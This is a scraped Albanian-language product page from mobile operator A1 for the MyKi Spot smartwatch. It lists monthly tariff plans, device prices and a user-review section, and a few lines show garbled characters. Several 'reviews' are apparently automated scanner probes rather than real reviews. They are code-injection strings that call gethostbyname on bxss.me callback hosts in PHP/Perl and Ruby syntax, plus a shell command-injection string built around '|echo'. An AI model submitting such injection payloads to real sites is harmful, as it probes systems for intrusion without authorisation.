Sasi të kufizuara
Në dispozicion
Nuk është në dispozicion onlajn
Ngjyrën: Black

Në dispozicion në sasi të kufizuara

Në dispozicion

Nuk është në dispozicion onlajn

Tarifa
A1 Myki Pet
Ndrysho tarifën
Mënyra e pagesës
Me tarif� t� nj�hershme prej 199 den. p�r pajisje me k�ste
Çmimi

0 den.

Transporti falas

A dëshironi të dini kur do të ketë në dispozicion

Sasi të kufizuara
Në dispozicion
Nuk është në dispozicion onlajn

A1 Nova XS

499 den./muaj

 
 
4GB
 
internet kombëtar 
 
 
  
  
Pakufizuar
 
minuta kombëtare 
  
 
 
  
  
 
 
  

Çmimi për MyKi Spot

1.999 den.
Zgjidhni

A1 Nova S

899 den./muaj

 
60GB
 
internet kombëtar 
A1 Net Sef
 
deri më 50GB 
  
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për MyKi Spot

0 den.
Zgjidhni

A1 Nova M

1.099 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për MyKi Spot

0 den.
Zgjidhni

A1 Nova L

1.299 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për MyKi Spot

0 den.
Zgjidhni
Zgjidhni tarifën
Kthimi i produktit
Dorëzim falas
Gjithmon në përfiti
Pagesë e sigurtë

MyKi Spot

Çmimi i pajisjes dhe tarifa
Tarifa
Kohëzgjatja e kontratës
Mënyra e pagesës
Me tarif� t� nj�hershme prej 199 den. p�r pajisje me k�ste

A1 Nova XS

499 den./muaj

 
 
4GB
 
internet kombëtar 
 
 
  
  
Pakufizuar
 
minuta kombëtare 
  
 
 
  
  
 
 
  

Çmimi për MyKi Spot

1.999 den.
Zgjidhni

A1 Nova S

899 den./muaj

 
60GB
 
internet kombëtar 
A1 Net Sef
 
deri më 50GB 
  
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për MyKi Spot

0 den.
Zgjidhni

A1 Nova M

1.099 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për MyKi Spot

0 den.
Zgjidhni

A1 Nova L

1.299 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
 
 
  
  
 
 
  
  

Çmimi për MyKi Spot

0 den.
Zgjidhni

A1 Nova XL

1.599 den./muaj

5G
 
pakufizuar
 
internet kombëtar 
A1 Net Sef
 
deri më 100GB 
me mundësi për shkëmbim 
Pakofizuar
 
minuta kombëtare dhe ЅМЅ 
  
100 minuta
 
biseda jashtë vendit 
  
 
 
  
  

Çmimi për MyKi Spot

0 den.
Zgjidhni

A1 Myki

399 den./muaj

250MB
 
internet kombëtar 
për shfrytëzimin e smart-orës 
500 minuta
 
drejt A1 
  
50 minuta
 
drejt rrjeteve tjera kombëtare 
  
50 SMS
 
drejt të gjitha rrjeteve 
  

Çmimi për MyKi Spot

3.499 den.
Zgjidhni

A1 Myki Pet

199 den./muaj

Tarifa e rekomanduar
250MB
 
internet kombëtar 
për shfrytëzimin e smart-orës 
500 minuta
 
drejt A1 
  
50 minuta
 
drejt rrjeteve tjera kombëtare 
  

Çmimi për MyKi Spot

0 den.
E zgjedhur

A1 Senior

299 den./muaj

 
 
500MB
 
internet kombëtar 
Pakufi
 
Minuta drejt A1 
  
50
 
Minuta drejt rrjeteve tjera 
kombëtare (fikse/cel.) 
50
 
SМЅ drejt të gjitha 
rrjeteve kombëtare 

Çmimi për MyKi Spot

2.999 den.
Zgjidhni
Basic price
3.999denarë
Pripejd
4.499denarë
Çmimi vetëm për pajisjen
4.499denarë

MyKi Spot

Çka ka në kuti?
  Karakteristikat themelore
   Karakteristikat e hollësishme
   Garancia dhe servisi
   muajgarancia e prodhuesit
   Servisues i autorizuar për këtë pajisje

   Nëse keni nevojë për servis për MyKi Spot, kontaktoni servisuesin e autorizuar.

   MyKi Spot

   Vlerësimi nga shfrytëzuesit

   Ka gjithsej 10 recenzione për këtë pajisje

   4
   6
   0
   0
   0
   4.4
   '.gethostbyname(lc('hitxf'.'mmavhmyse1265.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(87).chr(112).chr(88).'
   21.01.2023

   A Ju ndihmoi ky recenzion?
   ".gethostbyname(lc("hitpy"."wsoebxeya3a51.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(87).chr(104).chr(87)."
   21.01.2023

   A Ju ndihmoi ky recenzion?
   |echo ndilmr$()\ dzjfal\nz^xyu||a #' |echo ndilmr$()\ dzjfal\nz^xyu||a #|" |echo ndilmr$()\ dzjfal\nz^xyu||a #
   21.01.2023

   A Ju ndihmoi ky recenzion?
   zFPWdwPk
   21.01.2023

   A Ju ndihmoi ky recenzion?
   zFPWdwPk
   21.01.2023

   A Ju ndihmoi ky recenzion?
   zFPWdwPk
   21.01.2023

   A Ju ndihmoi ky recenzion?
   "+"A".concat(70-3).concat(22*4).concat(117).concat(75).concat(122).concat(85)+(require"socket" Socket.gethostbyname("hiteu"+"lzgjumwwb8de7.bxss.me.")[3].to_s)+"
   21.01.2023

   A Ju ndihmoi ky recenzion?
   '+'A'.concat(70-3).concat(22*4).concat(121).concat(69).concat(122).concat(87)+(require'socket' Socket.gethostbyname('hitcm'+'tndocfdd47906.bxss.me.')[3].to_s)+'
   21.01.2023

   A Ju ndihmoi ky recenzion?
   zFPWdwPk
   21.01.2023

   A Ju ndihmoi ky recenzion?
   zFPWdwPk
   21.01.2023

   A Ju ndihmoi ky recenzion?